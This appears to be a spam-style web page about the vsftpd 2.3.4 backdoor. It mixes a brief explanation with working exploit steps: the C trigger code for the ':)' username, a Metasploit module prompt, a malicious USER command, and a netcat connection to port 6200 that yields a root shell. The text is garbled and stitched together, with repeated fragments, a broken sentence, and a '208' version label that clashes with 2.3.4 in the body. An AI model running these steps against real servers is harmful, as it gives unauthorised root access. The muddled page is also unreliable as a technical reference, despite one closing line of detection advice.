Vsftpd 208 Exploit Github Install Work ◆

The backdoor code injected into the compromised VSFTPD source code monitors incoming FTP connection requests.

nc target.com 6200

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit vsftpd 208 exploit github install

nc 6200 # You now have a root command prompt id # uid=0(root) gid=0(root) groups=0(root) Use code with caution. 3. Exploitation via Metasploit Framework

# Send the malicious FTP command send_cmd(['USER', 'A'*1024 + "\x00"], false) The backdoor code injected into the compromised VSFTPD

if ((str[i] == ':') && (str[i+1] == ')')) int vsf_sysutil_extra(); vsf_sysutil_extra(); Use code with caution.

When a client attempts to authenticate to the compromised vsftpd service, the daemon checks the username. If the username contains the characters :) , the software triggers a hidden routine: It forks a new process. It binds a root shell ( /bin/sh ) to TCP port . Exploitation via Metasploit Framework # Send the malicious

The backdoor is triggered when a user attempts to log in with a username that ends with the characters :) (a smiley face). Vsftpd 208 Exploit Github Install - Ultra Tower

If you see a process listening on 6200, your server has been exploited. Kill the process and investigate.